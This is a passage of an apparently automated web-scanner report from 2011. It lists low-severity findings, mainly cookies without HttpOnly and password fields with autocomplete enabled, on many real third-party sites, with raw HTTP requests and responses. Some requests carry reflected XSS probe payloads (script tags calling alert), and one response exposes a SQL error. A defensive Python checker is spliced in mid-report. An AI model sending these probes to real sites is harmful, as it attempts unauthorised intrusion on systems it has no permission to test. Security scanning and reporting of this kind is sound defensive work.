Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: NSC_wjq-cmpht-8080=4459351229a0;expires=Fri, 28-Jan-11 14:18:22 GMT;path=/
Content-Length: 102098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

11.572. http://www.parkersoft.co.uk/client.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /client.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /client.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Proxy-Connection: keep-alive
Referer: http://www.whoson.com/installable.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15870
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45; path=/; HttpOnly
Set-Cookie: whoson=530-50268.8034574; expires=Mon, 28-Mar-2011 23:00:00 GMT; path=/
Date: Fri, 28 Jan 2011 13:57:48 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...

11.573. http://www.parkersoft.co.uk/supnotes.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /supnotes.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /supnotes.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:58:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wd23wlvl4tjcz4554zaqcfyv; path=/; HttpOnly
Set-Cookie: whoson=584-50288.6160842; expires=Mon, 28-Mar-2011 23:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...

11.574. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 15:00:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 15:00:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...

11.575. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stylemepretty.com
Path:   /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 15:06:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Vary: Cookie,Accept-Encoding
Set-Cookie: wpmp_switcher=desktop; expires=Sat, 28-Jan-2012 15:06:08 GMT; path=/
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 15:06:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39718


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE 7]><![endif]-->
<!--[if lt IE 7]><![endif]-->
<html xmlns="http://
...[SNIP]...

11.576. http://www.zvents.com/zat

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /zat

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /zat?r=&url=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ea7771aeaee3%3D1&uid=Xu3uTnqUd1-EIF3JztHR7Q&src=zmp&pid=150&pt=homepage&sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220&type=view&cm=featured&oids=e%3A139733045%2Ce%3A155300665%2Ce%3A147270025%2Ce%3A142549185%2Ce%3A148455425%2Ce%3A151637365%2Ce%3A154912025%2Ce%3A155222925%2Ce%3A152086945%2Ce%3A161856385&spids=&__t=1296236235556 HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 28 Jan 2011 17:37:26 GMT
Content-Type: image/gif
Connection: keep-alive
X-Rack-Cache: miss
Cache-Control: private
Set-Cookie: welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;
Set-Cookie: _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; path=/; expires=Thu, 28-Apr-2011 17:37:26 GMT; HttpOnly
Content-Length: 42

GIF89a.............!.......,...........D.;

11.577. http://xads.zedo.com/ads2/c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xads.zedo.com
Path:   /ads2/c

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 15:06:31 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:31 GMT; DOMAIN=.zedo.com
Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:31 GMT;DOMAIN=.zedo.com;path=/;
Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:31 GMT; DOMAIN=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/
Vary: Accept-Encoding
Content-Length: 402
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/
...[SNIP]...

12. Password field with autocomplete enabled
There are 175 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


12.1. http://ar.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL: The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=g05urdbhcc12xm55kjeeji45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=g05urdbhcc12xm55kjeeji45; path=/; HttpOnly
Set-Cookie: spvdr=vd=55564d24-301b-478f-82b3-5dcbbd104f3e&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:43 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:42 GMT
Connection: close
Content-Length: 18354
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.2. http://bostonherald.com/track/inside_track/view.bg

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/view.bg

Issue detail

The page contains a form with the following action URL: The form contains the following password fields with autocomplete enabled:

Request

GET /track/inside_track/view.bg?articleid=1312557&format=comments&srvc=track&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 69819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.3. http://bostonherald.com/track/star_tracks/view.bg

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/star_tracks/view.bg

Issue detail

The page contains a form with the following action URL: The form contains the following password fields with autocomplete enabled:

Request

GET /track/star_tracks/view.bg?articleid=1312549&format=comments&srvc=track&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 67934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.4. http://bostonherald.com/users/login

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /users/login

Issue detail

The page contains a form with the following action URL: The form contains the following password field with autocomplete enabled:

Request

GET /users/login HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 05:21:14 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<hr class="userSep" />

<form name="register" action="/users/login?returnto=/users/" method="POST">

<div style="width:350px; margin:40px auto; ">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" style="width:340px;"/></div>
...[SNIP]...

12.5. http://bostonherald.com/users/register/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /users/register/

Issue detail

The page contains a form with the following action URL: The form contains the following password fields with autocomplete enabled:

Request

GET /users/register/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 05:21:14 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
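Every finding in this section is the same check: an `<input type="password">` whose enclosing `<form>` and the input itself both lack `autocomplete="off"`, so a browser that honours the attribute may store the credential and offer it to the next person at the keyboard. The following Python is an added example, not part of the scanner's report and not code from any of the sites listed; it reimplements that check over a string of HTML with the standard library only, and the two sample documents are constructed here, modelled on the register form shown above and on a hardened copy of it. Note the caveat a reviewer should attach to this Low-severity class: current versions of the major browsers ignore `autocomplete="off"` for their built-in password managers, so the attribute is a defence-in-depth measure against shared-machine form autofill rather than a control the site can rely on.

```python
"""Flag password inputs that leave browser autocompletion enabled.

Added example (not from the scanner report or the scanned sites).
A field is reported when neither the <input> nor its enclosing <form>
carries autocomplete="off"; browsers that honour the attribute inherit
the form-level value for every field inside it.
"""
from html.parser import HTMLParser


class PasswordAutocompleteScanner(HTMLParser):
    """Walk the markup and collect password fields with autocomplete enabled."""

    def __init__(self):
        super().__init__()
        self.form_stack = []   # (action, form_has_autocomplete_off) for open <form>s
        self.findings = []     # one dict per flagged password field

    def handle_starttag(self, tag, attrs):
        # html.parser yields None for valueless attributes; normalise to "".
        a = {k.lower(): (v if v is not None else "") for k, v in attrs}
        if tag == "form":
            self.form_stack.append((
                a.get("action", ""),            # "" => submits to the current URL
                a.get("autocomplete", "").strip().lower() == "off",
            ))
        elif tag == "input" and a.get("type", "text").lower() == "password":
            action, form_off = self.form_stack[-1] if self.form_stack else ("", False)
            field_off = a.get("autocomplete", "").strip().lower() == "off"
            if not (form_off or field_off):
                self.findings.append({
                    "action": action or "(no action attribute: current URL)",
                    "name": a.get("name") or a.get("id", ""),
                })

    def handle_endtag(self, tag):
        if tag == "form" and self.form_stack:
            self.form_stack.pop()


def find_autocomplete_password_fields(html):
    """Return [{'action': ..., 'name': ...}] for each password field left open."""
    scanner = PasswordAutocompleteScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample, modelled on the registration form excerpt above
# plus a form with no action attribute (as in the digg.com findings).
VULNERABLE_FORMS = """
<form name="register" action="/users/register/" method="POST">
  <input type="text" name="username" />
  <input type="password" value="" name="password" id="r_password" />
  <input type="password" value="" name="confirm_password" id="r_confirm_password" />
</form>
<form class="hidden">
  <input type="text" name="ident" value="" id="ident-saved">
  <input type="password" name="password" value="" id="password-saved">
</form>
"""

# Constructed hardened copy: autocomplete disabled at form level for the
# first form and at field level for the second.
HARDENED_FORMS = """
<form name="register" action="/users/register/" method="POST" autocomplete="off">
  <input type="text" name="username" />
  <input type="password" value="" name="password" id="r_password" />
  <input type="password" value="" name="confirm_password" id="r_confirm_password" />
</form>
<form class="hidden">
  <input type="text" name="ident" value="" id="ident-saved">
  <input type="password" name="password" value="" id="password-saved" autocomplete="off">
</form>
"""


if __name__ == "__main__":
    for label, doc in (("vulnerable", VULNERABLE_FORMS), ("hardened", HARDENED_FORMS)):
        for f in find_autocomplete_password_fields(doc):
            print(f"{label}: form action {f['action']!r} field {f['name']!r}")
```

Running the module reports three fields for the vulnerable sample (`password` and `confirm_password` posted to `/users/register/`, and `password` in the action-less form) and nothing for the hardened copy. Pointing the same function at a saved response body reproduces the scanner's result for that page.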

12.6. http://br.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:
/members.aspx
The form contains the following password field with autocomplete enabled:
txtPassword

Request

GET / HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rzczlq3uuxqphzq12ovdaz45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=rzczlq3uuxqphzq12ovdaz45; path=/; HttpOnly
Set-Cookie: spvdr=vd=646c9815-aa9c-4aef-98a9-a90044ab80e5&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:50 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:50 GMT
Connection: close
Content-Length: 18208
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.7. http://cafr.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:
/members.aspx
The form contains the following password field with autocomplete enabled:
txtPassword

Request

GET / HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=y3tfry450byj5jywotc4d055; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=y3tfry450byj5jywotc4d055; path=/; HttpOnly
Set-Cookie: spvdr=vd=afa07c32-e9d6-40f5-9fbf-41c391d891a9&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:52 GMT
Connection: close
Content-Length: 18731
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.8. http://de.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:
/members.aspx
The form contains the following password field with autocomplete enabled:
txtPassword

Request

GET / HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fhuicq55a4uitj55chpgdhek; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=fhuicq55a4uitj55chpgdhek; path=/; HttpOnly
Set-Cookie: spvdr=vd=02b46df6-422e-4d35-8928-ba18aa43474c&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:56 GMT; path=/
Set-Cookie: ide=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:56 GMT
Connection: close
Content-Length: 18297
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
